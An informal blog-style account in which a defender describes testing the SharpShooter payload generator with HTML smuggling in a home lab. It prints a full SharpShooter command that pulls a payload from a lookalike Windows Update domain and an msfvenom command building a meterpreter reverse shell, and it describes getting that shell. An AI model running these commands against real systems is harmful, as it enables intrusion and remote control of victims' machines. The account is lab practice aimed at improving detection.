3 hours into the night. I find myself bored as shit. I was covering my buddies shift in the SOC since he had plans with his girlfriend. There were no events going on. No active incidents. No emails to respond to nor things i felt like doing on the midnight shift. I paroosed /r/netsec and made it through the new posts fairly quickly. 9 hours left on my shift and I decided that I would play with new tools instead of watching movies. Im a blue team lead by trade and moonlight in the SOC but I like to play with new red team tools to stay sharp and to ensure I can exercise my team.
I read about this C# payload delivery mechanism in these slides i found on reddit. Even though its pretty simple I find html smuggling really intresting and a difficult problem to pick up in my tools, both on my homelab and enterprise networks.
So since i dont have direct access to my lab im running three browser windows with guacamole to connect to three diffrent VMs to try and do something. One if doing research on, the other has msfconsole open and the third is my windows 7 vm that is littered with malware. lol.
So the gist of it is that I needed to generate some shell code that SharpShooter could package up. Seems easy enough. I browse to shell storm and try to find a nice calc.exe thingy since that always gives me a good laugh.
I package it up with shell shorm in the command
python SharpShooter.py –payload hta –delivery web –web http://vvindowsupdate.com/wild.payload –shellcode –scfile ./hello.txt –smuggle –template mcafee –dotnetver 2 –output wild
Where my shellcode is in hello.txt
I get really excicted since my payload is created and i see my html page that is the delivery mechanism.
I dump it in our malware slack channel and download it on my Malware VM and open the html file.
AND NOTHING HAPPENS!!.
Me. Eager as a child on christmas morning watching my payload fail. GAAAAHHHHHHHHHH.
I switch over to my sysinterals directory and pop open procmon and watch the child process spawn under chrome and then die.
I sit there confused.
Firewall shouldnt be getting in the way and the handler is listening on my other box.
I fiddle with settings for two hours and eventually i get annoyed. I check the github and conclude im doing some thing wrong.
After attending to some actualy work things I try again and decide to switch from the reverse_http they use in the video to a reverse_tcp.
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.1.198 LPORT=80 EnableStageEncoding=True PrependMitigate=True -f csharp > dump.txt
Boom. Instant shell.
To summarize what I did i was able to generate a payload and a delivery mecahninsm using sharp shooter.
I then dropped the payload at https://vvindowsupdate.com/wild.payload
The html was sent to the user but its not crazy that it could be used as a watering hole attack as well.
I sit there somewhat satisfied. The fact that i was able to use an html doc to smuggle in code to sit on disk that only purpose was to sit on disk and reach out to some c2 domain to grab a payload and pop it into memory via the DotNetToJScript is kinda cool.
Granted I didnt write it myself but it still marveled that it worked. Or maybe i was just delierous since it was 430 in the morning.
Anyway major props to https://twitter.com/domchell and check out his orginal blog post here https://www.mdsec.co.uk/2018/03/payload-generation-using-sharpshooter/